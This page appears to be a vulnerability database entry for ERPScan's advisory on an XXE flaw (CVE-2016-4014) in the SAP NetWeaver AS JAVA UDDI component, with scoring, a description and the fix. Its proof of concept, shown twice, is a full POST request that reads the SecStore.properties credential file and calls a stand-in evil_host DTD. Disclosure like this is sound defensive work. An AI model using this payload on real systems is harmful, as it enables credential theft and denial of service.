Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
erpscanERPScanERPSCAN-16-020
HistoryOct 20, 2015 - 12:00 a.m.

SAP NetWeaver JAVA AS UDDI component - XXE vulnerability

2015-10-2000:00:00
erpscan.io
82

EPSS

0.013

Percentile

86.0%

JSON

Application: SAP AS JAVA **Versions Affected:**SAP AS JAVA 7.4 Vendor URL:SAP **Bugs:**XXE **Reported:**20.10.2015 **Vendor response:**21.10.2015 **Date of Public Advisory:**14.04.2016 **Reference:**SAP Security Note 2254389 Author: Vahagn Vardanyan (ERPScan)

Vulnerability Information

Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-4014

CVSS Information

CVSS v3 Base Score: 7.1 / 10
CVSS v3 Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)
VULNERABILITY DESCRIPTION

An attacker can trigger an XML Entity Expansion or XML External Entity Injection. This causes the entire machine to become unresponsive until the process is terminated manually. An attacker can use this flaw to perform a denial-of-service (DoS) attack.

VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.4
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note SAP Security Note 2254389

TECHNICAL DESCRIPTION

Proof of Concept

Java

POST /uddi/api/replication HTTP/1.1 Content-Type: text/xml; charset=utf-8 <!DOCTYPE foo [ <!ENTITY % file SYSTEM “file:///C:/usr/sap/DM0/SYS/global/security/data/SecStore.properties”> <!ENTITY % dtd SYSTEM “http://evil_host/evil_.dtd”> %dtd;]> <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/”> <SOAP-ENV:Header/> <SOAP-ENV:Body> <do_ping> <authInfo/> <findQualifiers> <findQualifier>FINDQUALIFIER</findQualifier> </findQualifiers> <tModelBag> <tModelKey>asd</tModelKey> </tModelBag> </do_ping> </SOAP-ENV:Body> </SOAP-ENV:Envelope>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

|

POST /uddi/api/replication HTTP/1.1

Content-Type: text/xml; charset=utf-8

<!DOCTYPE foo [

<!ENTITY % file SYSTEM “file:///C:/usr/sap/DM0/SYS/global/security/data/SecStore.properties”>

<!ENTITY % dtd SYSTEM “http://evil_host/evil_.dtd”>

%dtd;]>

<SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/”>

<SOAP-ENV:Header/>

<SOAP-ENV:Body>

<do_ping>

<authInfo/>

<findQualifiers>

<findQualifier>FINDQUALIFIER</findQualifier>

</findQualifiers>

<tModelBag>

<tModelKey>asd</tModelKey>

</tModelBag>

</do_ping>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

—|—

Related

cvelist 1
cve 1
packetstorm 1
prion 1
nvd 1
cvelist
cvelist
CVE-2016-4014
2016-04-14 14:00:00
cve
cve
CVE-2016-4014
2016-04-14 14:59:09
packetstorm
packetstorm
SAP NetWeaver AS JAVA 7.4 XXE Injection
2016-07-14 00:00:00
prion
prion
Xxe
2016-04-14 14:59:00
nvd
nvd
CVE-2016-4014
2016-04-14 14:59:09

EPSS

0.013

Percentile

86.0%

JSON
Related for ERPSCAN-16-020
cvelist1cve1packetstorm1prion1nvd1